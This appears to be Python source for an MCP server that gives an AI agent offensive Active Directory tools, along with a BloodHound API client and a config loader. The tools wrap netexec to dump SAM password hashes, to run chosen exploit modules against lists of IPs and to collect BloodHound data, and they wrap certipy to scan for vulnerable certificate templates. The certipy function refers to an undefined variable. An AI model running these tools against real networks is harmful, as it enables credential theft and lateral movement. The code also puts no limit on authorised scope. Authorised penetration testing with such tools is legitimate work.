@mcp.tool(name="dump_sam_hashes",description="dump sam hashes if we have some redentials using the sec dump which is similar to secretdump,use ntlm hash or normal password")
def dump_sam_hashes(ips:List[str],username:str,password:str,ntlm:bool=False,kerberos:bool=False):
    if (ntlm):
        return run_command(["netexec","smb"]+ips+["-u",username,"-H",password,"--sam","secdump"])
    elif(kerberos):
        return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,'-k',"--sam","secdump"])
    else:
        return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"--sam","secdump"])



@mcp.tool(name="bloodhound_ingest",description="use the netexec's bloodhound feature to extract the json data to be uploaded to bloodhound database")
def bloodhound_ingest(ips:List[str],username:str,password:str,ntlm:bool=False,kerberos:bool=False):
    if (ntlm):
        return run_command(["netexec","ldap"]+ips+["-u",username,"-H",password,"--bloodhound","--collection","all"])
    elif(kerberos):
        return run_command(["netexec","ldap"]+ips+["-u",username,"-p",password,'-k',"--bloodhound","--collection","all"])
    else:
        return run_command(["netexec","ldap"]+ips+["-u",username,"-p",password,"--bloodhound","--collection","all"])

@mcp.tool(name="check_module",description="Call this before before using a module to check available exploit modules for a certain netexec supported protocol {rdp,ldap,winrm,smb,ssh,nfs,ftp,wmi,mssql,vnc} and based on the description of the modules chose one to perform")
def check_module(prot:str):
    return run_command(["netexec",prot,'-L'])

@mcp.tool(name='check_options',description='After selecting the right module call this to check what options that module presents')
def check_options(prot:str,module:str):
    return run_command(["netexec",prot,'-M',module,'--options'])


@mcp.tool(name='use_module',description='Call this to use the module with the right options and make sure to satisfy the need of certain variables like credentials etc.If no credentials are needed for the module or no valid credentials are found leave the username and password default (empty). Options syntax is ["option1=value1","options2=value2",...]')
def use_module(ips:List[str],prot:str,module:str,options:List[str],username:str,password:str,kerberos:bool=False,ntlm:bool=False):
    if (ntlm):
        return run_command(["netexec",prot]+ips+["-u",username,"-H",password,"-M",module,"-o"]+options)
    elif(kerberos):
        return run_command(["netexec",prot]+ips+["-u",username,"-p",password,'-k',"-M",module,"-o"]+options)
    else:
        return run_command(["netexec",prot]+ips+["-u",username,"-p",password,"-M",module,"-o"]+options)

@mcp.tool(name="test_bloodhound_connection",description="connect to bloodhoundapi and get version")
def test_bloodhound_connection():
    return bloodhound.connectToApi()

@mcp.tool(name="upload_zip_to_bloodhound",description="Upload data zip to bloodhound to ingest and analyze (wait until it gets ingested before testing queries)")
def upload_zip_to_bloodhound(zip_path):
    return bloodhound.upload_zip(zip_path)


@mcp.tool(name="list_saved_quereis",description="list already saved queries in bloodhound")
def list_saved_queries():
    return bloodhound.list_saved_queries()

@mcp.resource("data://bloodhound_cypher_queries")
def get_custom_queries():
    # Resolve path relative to this script (safer than relying on current working dir)
    p = Path(__file__).parent / "ressources/custom_bloodhound_queries.json"

    # use 'encoding' (not 'encode') and json.load for file -> python object
    with p.open("r", encoding="utf-8") as f:
        return json.load(f)



@mcp.tool(name="run_blooodhound_query",description="Run a bloodhound cypher query of your choice (use this to collect information about the network and potentially identify attack vectors)")
def run_bloodhound_query(query):
    return bloodhound.run_cypher_query(query)

@mcp.tool(name="certipy_scan",description="Call this to enumerating Active Directory Certificate Services (AD CS) vulnerabilities. username syntax is: username@domain")
def certipy_scan(ip:str,username:str,password:str,ntlm:bool=False,kerberos:bool=False):
    if ntlm:
        return run_command(["certipy","find","-vulnerable","-u", user ,"-hashes",password,"-dc-ip",ip,"-stdout"])
    if kerberos:
        return run_command(["certipy","find","-vulnerable","-u", user ,"-k","-p",password,"-dc-ip",ip,"-stdout"])

    return run_command(["certipy","find","-vulnerable","-u", user ,"-p",password,"-dc-ip",ip,"-stdout"])

def main():
    
    mcp.run()

if __name__ == "__main__":

    main()




from typing import Dict, Optional, Any
from pathlib import Path
from datetime import datetime, timezone
import json
import requests
import hmac
import hashlib
import base64
from pentestmcp import config
"""bloodhound api calls automation in prog....."""
config.load_variables()
BHE_SCHEME = "http"
PRINT_PRINCIPALS = False
PRINT_ATTACK_PATH_TIMELINE_DATA = False
PRINT_POSTURE_DATA = False

DATA_START = "1970-01-01T00:00:00.000Z"
DATA_END = datetime.now(timezone.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z' # Now

class Credentials(object):
    def __init__(self, token_id: str, token_key: str) -> None:
        self.token_id = token_id
        self.token_key = token_key

class Domain(object):
    def __init__(self, name: str, id: str, collected: bool, domain_type: str) -> None:
        self.name = name
        self.id = id
        self.type = domain_type
        self.collected = collected

class APIVersion(object):
    def __init__(self, api_version: str, server_version: str) -> None:
        self.api_version = api_version
        self.server_version = server_version
class Client(object):
    def __init__(self, scheme: str, host: str, port: int, credentials: Credentials) -> None:
        self._scheme = scheme
        self._host = host
        self._port = port
        self._credentials = credentials

    def _format_url(self, uri: str) -> str:
        formatted_uri = uri
        if uri.startswith("/"):
            formatted_uri = formatted_uri[1:]

        return f"{self._scheme}://{self._host}:{self._port}/{formatted_uri}"

    def _request(
        self,
        method: str,
        uri: str,
        body: Optional[bytes] = None,
        content_type: str =None ,
        timeout: Optional[float] = None,
    ) -> requests.Response:
        """
        Signed request used by BloodHound CE.
        - `content_type` lets us upload application/zip or application/json.
        - Signature header is base64 text (not bytes).
        """
        # start chain with token_key as HMAC key
        digester = hmac.new(self._credentials.token_key.encode("utf-8"), None, hashlib.sha256)

        # OperationKey: method + uri (no delimiter)
        digester.update(f"{method}{uri}".encode("utf-8"))

        # chain
        digester = hmac.new(digester.digest(), None, hashlib.sha256)

        # RequestDate (RFC3339-like). Use UTC and include 'Z' to match expectations.
        datetime_formatted = datetime.now(timezone.utc).isoformat(timespec="seconds").replace("+00:00", "Z")
        # docs say chain uses hours only (first 13 chars: YYYY-MM-DDTHH)
        digester.update(datetime_formatted[:13].encode("utf-8"))

        # chain again
        digester = hmac.new(digester.digest(), None, hashlib.sha256)

        # include body bytes in signature if present
        if body is not None:
            digester.update(body)

        # signature as BASE64 string (important: decode to ascii)
        signature_b64 = base64.b64encode(digester.digest()).decode("ascii")
        if content_type != None:
            
            headers: Dict[str, str] = {
                "User-Agent": "bhe-python-sdk 0001",
                "Authorization": f"bhesignature {self._credentials.token_id}",
                "RequestDate": datetime_formatted,
                "Signature": signature_b64,
                "Content-Type": content_type,
            }
        else:
            headers: Dict[str, str] = {
            "User-Agent": "bhe-python-sdk 0001",
            "Authorization": f"bhesignature {self._credentials.token_id}",
            "RequestDate": datetime_formatted,
            "Signature": signature_b64,
        }

        # perform request (use data=body so we pass raw bytes as-is)
        resp = requests.request(method=method, url=self._format_url(uri), headers=headers, data=body, timeout=timeout)
        resp.raise_for_status()  # raise on HTTP error (optional; useful for automation)
        return resp

    def get_version(self) -> APIVersion:
        response = self._request("GET", "/api/version")
        payload = response.json()

        return APIVersion(api_version=payload["data"]["API"]["current_version"], server_version=payload["data"]["server_version"])


def connectToApi():
    # This might be best loaded from a file
    credentials = Credentials(
        token_id=config.BHE_TOKEN_ID,
        token_key=config.BHE_TOKEN_KEY,
    )

    client = Client(scheme=BHE_SCHEME, host=config.BHE_DOMAIN, port=config.BHE_PORT, credentials=credentials)
    
    return client.get_version().api_version



def upload_zip(zip_path: str) -> Dict[str, Any]:
    """
    Upload a SharpHound zip (or BloodHound JSON zip) using the BHCE file-upload job flow:
      1) POST /api/v2/file-upload/start  -> get upload id
      2) POST /api/v2/file-upload/{id}   -> upload bytes (Content-Type: application/zip)
      3) POST /api/v2/file-upload/{id}/end -> finish job

    Returns the final job response JSON (or raises on error).
    """


    # create client
    credentials = Credentials(token_id=config.BHE_TOKEN_ID, token_key=config.BHE_TOKEN_KEY)
    client = Client(scheme=BHE_SCHEME, host=config.BHE_DOMAIN, port=config.BHE_PORT, credentials=credentials)

    p = Path(zip_path)
    if not p.exists():
        raise FileNotFoundError(f"{zip_path} not found")

    zip_bytes = p.read_bytes()

    # 1) create upload job
    resp = client._request("POST", "/api/v2/file-upload/start", content_type="application/json")
    # response body should contain the upload job id in JSON: { "data": { "id": "<id>" }, ... }
    start_payload = resp.json()
    upload_id = start_payload.get("data", {}).get("id")
    if not upload_id:
        raise RuntimeError(f"Could not create upload job: {start_payload}")

    # 2) upload the zip bytes (include body bytes when signing)
    upload_uri = f"/api/v2/file-upload/{upload_id}"
    client._request("POST", upload_uri, body=zip_bytes, content_type="application/zip")
    # 3) finish the job
    end_uri = f"/api/v2/file-upload/{upload_id}/end"
    end_resp = client._request("POST", end_uri, body=None, content_type="application/json")
    # API returns 204 No Content on success; depending on your client .json() may fail.
    if end_resp.status_code == 204:
        return {"status": "accepted", "upload_id": upload_id}
    else:
        return end_resp

def list_saved_queries():
    credentials = Credentials(
        token_id=config.BHE_TOKEN_ID,
        token_key=config.BHE_TOKEN_KEY,
    )

    client = Client(scheme=BHE_SCHEME, host=config.BHE_DOMAIN, port=config.BHE_PORT, credentials=credentials)
    response=client._request("GET","/api/v2/saved-queries")
    return response.json()
def run_cypher_query(query):
    credentials = Credentials(
        token_id=config.BHE_TOKEN_ID,
        token_key=config.BHE_TOKEN_KEY,
    )

    client = Client(scheme=BHE_SCHEME, host=config.BHE_DOMAIN, port=config.BHE_PORT, credentials=credentials)
    payload={"query":query}
    data=json.dumps(payload).encode('utf-8')
    response=client._request("POST","/api/v2/graphs/cypher",body=data,content_type="application/json")
    return response.json()

"""NEO4J implementation coming next """



import json
from pathlib import Path
from typing import Any, Dict, Optional

# keep the module-level definitions and type hints
PROJECT_DIRECTORY: Optional[str] = None
BHE_DOMAIN: Optional[str] = None
BHE_PORT: Optional[int] = None
BHE_TOKEN_ID: Optional[str] = None
BHE_TOKEN_KEY: Optional[str] = None

DEFAULT_KEYS = (
    "PROJECT_DIRECTORY",
    "BHE_DOMAIN",
    "BHE_PORT",
    "BHE_TOKEN_ID",
    "BHE_TOKEN_KEY",
)

def load_variables() -> Dict[str, Optional[Any]]:
    """
    Load configuration from a JSON file, set module globals, and return a dict.
    Empty strings become None. BHE_PORT will be converted to int when possible.
    """
    global PROJECT_DIRECTORY, BHE_DOMAIN, BHE_PORT, BHE_TOKEN_ID, BHE_TOKEN_KEY

    p = Path(__file__).parent/"config/config.json"
  
    data = json.loads(p.read_text(encoding="utf-8"))

    loaded: Dict[str, Optional[Any]] = {}
    for key in DEFAULT_KEYS:
        val = data.get(key)
        if isinstance(val, str) and val.strip() == "":
            val = None
        if key == "BHE_PORT" and val is not None:
            try:
                val = int(val)
            except (TypeError, ValueError):
                pass
        loaded[key] = val

    PROJECT_DIRECTORY = loaded["PROJECT_DIRECTORY"]
    BHE_DOMAIN = loaded["BHE_DOMAIN"]
    BHE_PORT = loaded["BHE_PORT"]
    BHE_TOKEN_ID = loaded["BHE_TOKEN_ID"]
    BHE_TOKEN_KEY = loaded["BHE_TOKEN_KEY"]

    return loaded
